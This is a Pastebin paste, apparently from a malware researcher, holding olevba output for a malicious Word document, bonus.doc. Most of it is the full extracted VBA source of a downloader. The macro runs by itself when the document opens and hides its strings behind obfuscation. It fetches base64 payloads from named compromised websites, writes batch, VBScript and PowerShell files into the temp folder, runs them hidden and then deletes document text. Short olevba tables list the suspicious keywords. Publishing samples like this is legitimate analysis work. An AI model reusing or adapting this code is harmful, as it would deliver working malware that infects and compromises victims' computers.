dynamoo

Malicious Word macro

Jul 17th, 2015
612
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- bonus.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: bonus.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: bonus.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Dqwkdojqwiodqw_Open()
  16.      
  17. End Sub
  18. Sub Ejoqiwjdioqwjdqo_Open()
  19.      
  20. End Sub
  21. Sub Auto_Open()
  22.     Djiqowjdwoiqjdqwo
  23. End Sub
  24. Sub Djiqowjdwoiqjdqwo()
  25.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
  26.     Xjqwidjowqjdq
  27. End Sub
  28. Sub Giqjwdhqwkjq()
  29.     DQUHWDIWQ = "eji21h ui21he21"
  30. End Sub
  31.  
  32. Sub AutoOpen()
  33.     Auto_Open
  34. End Sub
  35. Sub Workbook_Open()
  36.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
  37.     Auto_Open
  38. End Sub
  39.  
  40. Sub Xjqwidjowqjdq()
  41.  
  42.    
  43.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  44.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
  45.     BOLIVIA = Chr(90 + 2)
  46.    
  47.    
  48.     ANGOLA = Ubqhwdhwqbd(15425) + ""
  49.     SPAIN = Chr(84) & "em" + "p"
  50.     QHDQUWH = ANGOLA
  51.     FL2 = QHDQUWH
  52.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  53.    
  54.     silkroad = 9
  55.     jwnqdw = -1
  56.    
  57.     BOSNIA = 12312312
  58.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  59.     BALAGAN = BOSNIA
  60.    
  61.  
  62.     TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
  63.     JWIDJIAAA = ""
  64.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
  65.     QIWJDABB = "b"
  66.     HUYFEA = QIWJDABB + "a" + "t"
  67.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
  68.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  69.    
  70.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
  71.     SSS = Chr(BALAGAN + 2 + gana)
  72.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  73.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  74.    
  75.     INTG = "" & "o" & "bject"
  76.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
  77.     AFTG = Chr(109) & KIWD
  78.    
  79.     SXEE = Chr(46)
  80.     SXAA = Chr(101)
  81.     SXE = SXEE & SXAA & "" & "xe"
  82.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  83.    
  84.    
  85.    
  86.     HUQD = Chr(30 + 16 + 1)
  87.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
  88.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
  89.      
  90.     PSPTH = PH2 + PSFL
  91.     VBPTH = PH2 + VBFL
  92.     BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
  93.     ABPTH = PH2 + BAFL
  94.     BAPTH = ABPTH
  95.     JHQKWDQAASS = BQHJDQ
  96.    
  97.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  98.    
  99.     DRT = 315
  100.     BFT = 316
  101.     CFT = 317
  102.     DFT = 318
  103.     EFT = 319
  104.     Dim NUWDHUQHUQWDH As String
  105.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  106.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  107.    
  108.    
  109.    
  110.     TSTS = "." + "t" + "xt"
  111.     CDDD = "78672738612836" + TSTS
  112.     LNSS = "p" & "a" & "p" & "a" & "" + TSTS
  113.     STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
  114.     STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
  115.  
  116.  
  117.     PBIn = ATTH + STT1 + CDDD
  118.     CONT = Module2.Linolium(PBIn)
  119.      
  120.     asdwq = Rasdas(CONT)
  121.    
  122.     HQUWDAAA = "0"
  123.     If (asdwq <> "=") Then
  124.         PBIn = ATTH + STT2 + CDDD
  125.         CONT = Module2.Linolium(PBIn)
  126.         asdwq = CONT
  127.         HQUWDAAA = "1"
  128.     End If
  129.    
  130.     CONT = Quqhwdbyas(asdwq)
  131.      
  132.     Dim ahuywdgqy As String
  133.      
  134.     TVT10 = Port(CONT, "t" & "ext10")
  135.     TVT20 = Port(CONT, "t" & "ext20")
  136.     TVT21 = Port(CONT, "t" & "ext21")
  137.     TVT30 = Port(CONT, "t" & "ext30")
  138.     TVT31 = Port(CONT, "t" & "ext31")
  139.     XPT1 = Port(CONT, "stext1")
  140.     XPT2 = Port(CONT, "stext2")
  141.     XPT3 = Port(CONT, "stext3")
  142.    
  143.    
  144.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  145.     hufehu1 = InStr(WVR, "sers\")
  146.    
  147.     Dim hudhw As Integer
  148.     Dim ghdAdd(1 To 3)
  149.     ghdAdd(1) = "1"
  150.     ghdAdd(2) = "0"
  151.     ghdAdd(3) = "0"
  152.    
  153.     If (hufehu1 <> 0) Then
  154.         ghdAdd(1) = "2"
  155.     Else
  156.         ghdAdd(2) = "3"
  157.     End If
  158.  
  159.  
  160.     JHWQUD = Join(ghdAdd)
  161.     hudhw = Val(JHWQUD)
  162.    
  163.     Module2.WaitFor (1)
  164.    
  165.     MIWDWQ = ATTH + STT1 + LNSS
  166.     If (HQUWDAAA = "1") Then
  167.         MIWDWQ = ATTH + STT2 + LNSS
  168.     End If
  169.    
  170.     SEXX = Module2.Linolium(MIWDWQ)
  171.    
  172.     PSTB = PBIn + "123123123"
  173.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  174.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  175.     STAR1 = ATTH + MSTAR1
  176.     STAR2 = ATTH + MSTAR2
  177.     FFQ = "8"
  178.     FF = FFQ + SXE
  179.    
  180.      If (hudhw = 130) Then
  181.      Open BAPTH For Output As #DRT
  182.      Print #DRT, XPT1
  183.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  184.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  185.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  186.      Print #DRT, XPT2
  187.      Close #DRT
  188.      
  189.      Module2.WaitFor (1)
  190.      
  191.      Open VBPTH For Output As #BFT
  192.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  193.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  194.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  195.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  196.      Print #BFT, XPT3
  197.      Close #BFT
  198.      
  199.      BDDT.WaitFor (1)
  200.      NTH1 = Module3.HowEver(retVal, BAPTH)
  201.      
  202.      End If
  203.      
  204.      
  205.      HUDQG = "';"
  206.      
  207.      
  208.      
  209.       If (hudhw = 200) Then
  210.        
  211.      ZPQSKD = FL2
  212.      Open PSPTH For Output As #CFT
  213.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
  214.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
  215.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  216.      Print #CFT, "$ggtt = '" + SEXX + "';"
  217.      Print #CFT, "$pths = '" + PH2 + HUDQG
  218.      
  219.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  220.      Print #CFT, "$nnm = '" + FFQ + "';"
  221.      Print #CFT, TVT10
  222.      Close #CFT
  223.      
  224.      Open VBPTH For Output As #DFT
  225.      Print #DFT, TVT30
  226.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  227.      Print #DFT, TVT31
  228.      Close #DFT
  229.    
  230.      Open BAPTH For Output As #EFT
  231.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  232.      Print #EFT, TVT20
  233.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  234.      Print #EFT, ":nqudiiqhdjkashd"
  235.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  236.      Print #EFT, ":nqjdkbjkbdhjqwb"
  237.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  238.      Print #EFT, TVT21
  239.      Close #EFT
  240.      Module2.WaitFor (1)
  241.      
  242.      NTH2 = Module3.HowEver(retVal, BAPTH)
  243.      
  244.      End If
  245.      
  246.     JUW = Chr(47)
  247.     AKK = Chr(60)
  248.     ZKK = ">"
  249.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  250.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  251.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  252.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  253.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  254.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  255.    
  256. End Sub
  257.  
  258.  
  259. Public Function NUqwdqwbdsad(a As Integer)
  260. NUqwdqwbdsad = Sgn(a)
  261. End Function
  262.  
  263. Public Function Hhqudhqwgyuqwaaa(a As Integer)
  264. Hhqudhqwgyuqwaaa = Sgn(a)
  265. End Function
  266.  
  267. Public Function Ubqhwdhwqbd(a As Integer)
  268. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  269. End Function
  270.  
  271.  
  272. Public Function Quqhwdbyas(ByVal strData As String) As String
  273.     Dim objXML As Object
  274.     Dim objNode As Object
  275.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  276.     nudqwd = Log10(100)
  277.     asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
  278.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  279.     Set objXML = CreateObject(QHDHUQW)
  280.     Set objNode = objXML.createElement("b6" + "4")
  281.     objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  282.     objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  283.     objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  284.     objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  285.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
  286.     objNode.Text = strData
  287.     WUDHA = objNode.nodeTypedValue
  288.     Quqhwdbyas = WUDHA
  289.     Set objNode = Nothing
  290.     Set objXML = Nothing
  291. End Function
  292.  
  293. Public Function Port(a, b As String)
  294. Dim krd, tent As Integer
  295. UQWD = "" & Chr(58 + 2)
  296. NDUW = "" & Chr(70 - 8)
  297. krd = InStr(1, a, UQWD + b + NDUW) + 8
  298. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  299. KLMN = Mid$(a, krd, tent)
  300. HUQHWDA = KLMN
  301. Port = HUQHWDA
  302. End Function
  303.  
  304. Private Static Function Rasdas(a As String)
  305. Rasdas = Right(a, 1)
  306. End Function
  307.  
  308.  
  309. Private Static Function Log10(x)
  310. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
  311. Log10 = Log(x) / Log(10#)
  312. End Function
  313.  
  314.  
  315.  
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324.  
  325.  
  326.  
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  333. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  334. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  335. | Suspicious | Open           | May open a file                         |
  336. | Suspicious | Chr            | May attempt to obfuscate specific       |
  337. |            |                | strings                                 |
  338. | Suspicious | CreateObject   | May create an OLE object                |
  339. | Suspicious | Output         | May write to a file (if combined with   |
  340. |            |                | Open)                                   |
  341. | Suspicious | Print #        | May write to a file (if combined with   |
  342. |            |                | Open)                                   |
  343. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  344. |            |                | be used to obfuscate strings (option    |
  345. |            |                | --decode to see all)                    |
  346. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  347. |            |                | may be used to obfuscate strings        |
  348. |            |                | (option --decode to see all)            |
  349. +------------+----------------+-----------------------------------------+
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module1.bas
  352. in file: bonus.doc - OLE stream: u'Macros/VBA/Module1'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354. Public Function Xjdkhjfwefw(a As Object)
  355. Xjdkhjfwefw = (a.responseText)
  356. End Function
  357.  
  358.  
  359. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  360. ANALYSIS:
  361. No suspicious keyword or IOC found.
  362. -------------------------------------------------------------------------------
  363. VBA MACRO Module2.bas
  364. in file: bonus.doc - OLE stream: u'Macros/VBA/Module2'
  365. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  366.  
  367. Public Function Goabc(sps As String)
  368. QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  369. QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  370. QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  371. Goabc = Environ(sps)
  372. End Function
  373. Public Function Linolium(nbqjbdjqw As String)
  374. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  375. Dim ashdUHhda As String, hausd As Integer
  376. ashdUHhda = nbqjbdjqw
  377. hausd = Sgn(0 - Abs(Cos(140)))
  378. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
  379. 'MsgBox (BQDHJQWDGWQJGS)
  380. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
  381. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  382. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  383. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  384. End Function
  385. Sub WaitFor(NumOfSeconds As Long)
  386. Dim SngSec As Long
  387. SngSec = Timer + NumOfSeconds
  388. Do While Timer < SngSec
  389. DoEvents
  390. Loop
  391. End Sub
  392.  
  393.  
  394. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  395. ANALYSIS:
  396. +------------+--------------+-----------------------------------------+
  397. | Type       | Keyword      | Description                             |
  398. +------------+--------------+-----------------------------------------+
  399. | Suspicious | Open         | May open a file                         |
  400. | Suspicious | Chr          | May attempt to obfuscate specific       |
  401. |            |              | strings                                 |
  402. | Suspicious | CreateObject | May create an OLE object                |
  403. | Suspicious | Environ      | May read system environment variables   |
  404. +------------+--------------+-----------------------------------------+
  405. -------------------------------------------------------------------------------
  406. VBA MACRO Module3.bas
  407. in file: bonus.doc - OLE stream: u'Macros/VBA/Module3'
  408. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  409.  
  410.  
  411. Public Function India(dnuwhd As String, b As String, c As Integer)
  412. Dim selectedText As String
  413. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  414. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  415. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  416. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  417. With ssjidoqwhduqhwidqwudihq.Find
  418. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  419. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  420. .Text = dnuwhd
  421. .MatchWholeWord = True
  422. ssjidoqwhduqhwidqwudihq.Find.Execute
  423. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  424. Dim wdwq As String
  425. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  426. Dim wdsadwq As String
  427. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
  428. .Text = b
  429. .MatchWholeWord = True
  430. .Execute
  431. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  432. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  433. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  434. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  435.  
  436. If (c = 1) Then
  437.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  438. End If
  439. If (c = 2) Then
  440.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  441. End If
  442.  
  443. Dim hduwaa As Integer
  444. hduwaa = 1 - 2 ^ 4
  445.  
  446. QHUDW = Chr(33 + Sgn(hduwaa))
  447.  
  448. If (c = 3) Then
  449.     With ssjidoqwhduqhwidqwudihq.Find
  450.     .Text = a
  451.     .Replacement.Text = QHUDW
  452.     'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  453.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  454.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  455.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  456.    .Wrap = wdFindContinue
  457.     .Execute Replace:=wdReplaceAll
  458.     End With
  459. End If
  460.  
  461. End With
  462. End Function
  463.  
  464. Public Function HowEver(a As Variant, b)
  465. VGQDVHQWD = "h2eh1 fg12e"
  466. a = Shell(b, 0)
  467. HowEver = a
  468. End Function
  469.  
  470.  
  471.  
  472.  
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  485. ANALYSIS:
  486. +------------+---------+-----------------------------------------+
  487. | Type       | Keyword | Description                             |
  488. +------------+---------+-----------------------------------------+
  489. | Suspicious | Chr     | May attempt to obfuscate specific       |
  490. |            |         | strings                                 |
  491. | Suspicious | Shell   | May run an executable file or a system  |
  492. |            |         | command                                 |
  493. +------------+---------+-----------------------------------------+
Add Comment
Please, Sign In to add comment